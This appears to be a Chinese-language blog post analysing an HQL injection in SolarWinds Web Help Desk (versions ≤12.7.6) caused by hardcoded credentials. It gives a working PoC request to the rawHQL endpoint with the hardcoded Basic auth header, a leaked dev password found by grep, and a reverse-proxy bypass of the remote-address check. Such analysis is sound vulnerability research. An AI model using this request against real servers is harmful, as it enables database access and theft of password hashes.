type
Post
status
Published
date
Dec 14, 2022
slug
summary
tags
漏洞
业务安全
category
漏洞分析
icon
password
Property
Feb 9, 2023 07:32 AM
HQL查询是由hibernate引擎对查询进行解析并解释,然后将其转换为SQL
漏洞描述
SolarWinds Web Help Desk 存在HQL注入漏洞,该漏洞源于在SolarWinds Web帮助台产品中发现的硬编码凭证。攻击者可利用该漏洞对数据库执行任意HQL查询,并窃取用户的密码哈希值或向数据库插入任意数据。
影响版本
≤12.7.6
环境搭建
一路安装
跳过邮箱认证,输入用户名密码
漏洞复现
poc如下:
POST /helpdesk/assetReport/rawHQL HTTP/1.1 Host: localhost:8443 Cookie: XSRF-TOKEN=1b4b5cb9-770c-413d-8e1b-958f6eb1a7b2; JSESSIONID=C7790075346FBCD756B1262AD89CCD14; woinst=-1; whduser_helpdesk=admin X-XSRF-TOKEN: 1b4b5cb9-770c-413d-8e1b-958f6eb1a7b2 Authorization: Basic aGVscGRlc2s5MTExNEFENzdCNENEQ0Q5RTE4NzcxMDU3MTkwQzA4QjoxQTExRTQzMTg1M0Y0Q0M5OUMyN0JGNzI5NDc5RUI1RA== Pragma: no-cache Cache-Control: no-cache Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Edg/98.0.1108.56 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 8 select 1
漏洞分析
请求格式为
/helpdesk/WebObjects/HelpDesk.woa。路由规则使用Spring和私有代码控制,由于是硬编码问题,审计JSP代码时找到了一个固定的用户名和密码:
全路径搜索该字符串,在
ConstantAndSettings中定义了Production和Development两组硬编码用户密码:
以及其他的引用位置,主要包括
RestClient、RouteController和Authentication Manager:grep -R "dev-C4F8025E7" ./ ./helpdesk/WEB-INF/jsp/test/orionIntegrationTest.jsp: var auth = {loginName:'helpdeskIntegrationUser', password:'dev-C4F8025E7'}; ./helpdesk/WEB-INF/jsp/test/orionIntegrationTest.jsp: var auth = {loginName:'helpdeskIntegrationUser', password:'dev-C4F8025E7'}; ./helpdesk/WEB-INF/lib/whd-core/com/macsdesign/whd/rest/controllers/BasicAuthRouteController$1.class ./helpdesk/WEB-INF/lib/whd-core/com/solarwinds/whd/service/impl/auth/HelpdeskIntegrationAuthenticationManager.class grep -R helpdesk91114AD77B4CDCD9E18771057190C08B ./ ./helpdesk/WEB-INF/lib/whd-core/com/macsdesign/whd/rest/controllers/BasicAuthRouteController$1.class ./helpdesk/WEB-INF/lib/whd-core/com/solarwinds/whd/rest/RestClient.class ./helpdesk/WEB-INF/lib/whd-core/com/solarwinds/whd/service/impl/auth/ClusterNodeAuthenticationManager.class ./helpdesk/WEB-INF/lib/whd-core/com/solarwinds/whd/service/impl/auth/HelpdeskIntegrationAuthenticationManager.class ./helpdesk/WEB-INF/lib/whd-core/com/solarwinds/whd/service/impl/ClusterLicenseServiceImpl$RestClient.class
在
whd-web.jar/whd-security.xml中定位到引用的路由:
其中
AssetReportController定义了/rawQL接口执行HQL语句:
回到
HelpdeskIntegrationAuthenticationManager,其读取Production和Development模式下固定密码作为认证凭据:
注意到里边有一个远程地址检查的语句,这里先跳过进行本地测试,添加
Basic-Auth头aGVscGRlc2s5MTExNEFENzdCNENEQ0Q5RTE4NzcxMDU3MTkwQzA4QjoxQTExRTQzMTg1M0Y0Q0M5OUMyN0JGNzI5NDc5RUI1RA==
该接口还需要添加
X-XSRF-TOKEN字段,构造语句即可远程需另外配置反向代理
经测试
/helpdesk/assetReport/rawHQL远程访问返回404,原因是HelpdeskIntegrationAuthenticationManager对远程地址进行检查:
request.getRemoteAddress读取数据,在反向代理模式下可以绕过检查
- Author:w1nk1
- URL:https://notion-w1nk1.vercel.app//article/494157b0-261c-4fe3-bcd1-579a6dcd64ec
- Copyright:All articles in this blog, except for special statements, adopt BY-NC-SA agreement. Please indicate the source!
Relate Posts
